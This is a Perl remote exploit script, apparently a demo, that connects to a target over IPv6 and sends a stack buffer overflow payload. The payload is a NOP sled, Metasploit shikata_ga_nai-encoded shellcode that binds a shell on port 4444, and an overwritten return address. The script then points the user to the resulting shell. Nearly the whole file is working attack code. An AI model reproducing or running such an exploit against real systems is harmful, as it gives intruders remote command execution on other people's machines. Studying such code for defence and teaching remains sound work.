#!/usr/bin/perl
# Remote Exploit Demo rexploit-demo6.pl by Ph03n1X

use strict;
use warnings;
#cpan IO::Socket::INET6
use IO::Socket::INET6;

if(!$ARGV[1]){
 print $0 . " <IPv6 Address> <Port>\n";
 exit;
}

if($ARGV[0] =~ m/(\d+)\.(\d+)\.(\d+)\.(\d+)/){
 print $0 . " is not IPv6 family\n";
 exit;
}

#118 bytes shellcode bind execve on port 4444
#encoded with x86/shikata_ga_nai msf
my $shellcode = 
"\x2b\xc9\xdd\xc6\xb1\x17\xb8\x9f\xd4\xfb\x8e\xd9\x74\x24" .
"\xf4\x5a\x83\xc2\x04\x31\x42\x14\x03\x42\x14\xe2\x6a\xe5" .
"\x20\xdd\xd7\x55\xbd\xe8\x5e\xb8\x2b\x8b\x38\xf6\x2c\xc5" .
"\x21\x5a\x7f\xb8\x03\x09\x2d\x5a\xcb\xbc\x8d\xc4\x63\xb5" .
"\x2d\x80\x92\xa3\x31\xc3\x02\xbd\xab\xa0\xc0\xdb\x73\xea" .
"\x94\x94\xe2\x47\x90\x19\x6a\xf5\xca\xf7\xe2\x1b\xa9\x47" .
"\x92\x16\xad\x3b\x02\xc3\x92\x63\x78\x93\xa5\xea\x7a\xfc" .
"\x1a\x22\x08\x95\x0c\x13\x8c\x0c\xa2\xe2\xb3\x9f\x69\x7c" .
"\xd2\x90\x86\xb3\x95\xdb";

#NOP 86 bytes
my $nop = "\x90"x86;
my $eip = "\xe0\xf7\xff\xbf";

my $s = IO::Socket::INET6->new(PeerAddr => $ARGV[0],
   PeerPort => int($ARGV[1]),
   Domain => AF_INET6,
   Timeout => 5);

my $buffer = $nop . $shellcode . $eip;
#print $buffer . "\n";
print $s $nop.$shellcode.$eip;
print "Check your shell at " . $ARGV[0] . " on port 4444\n";
close($s);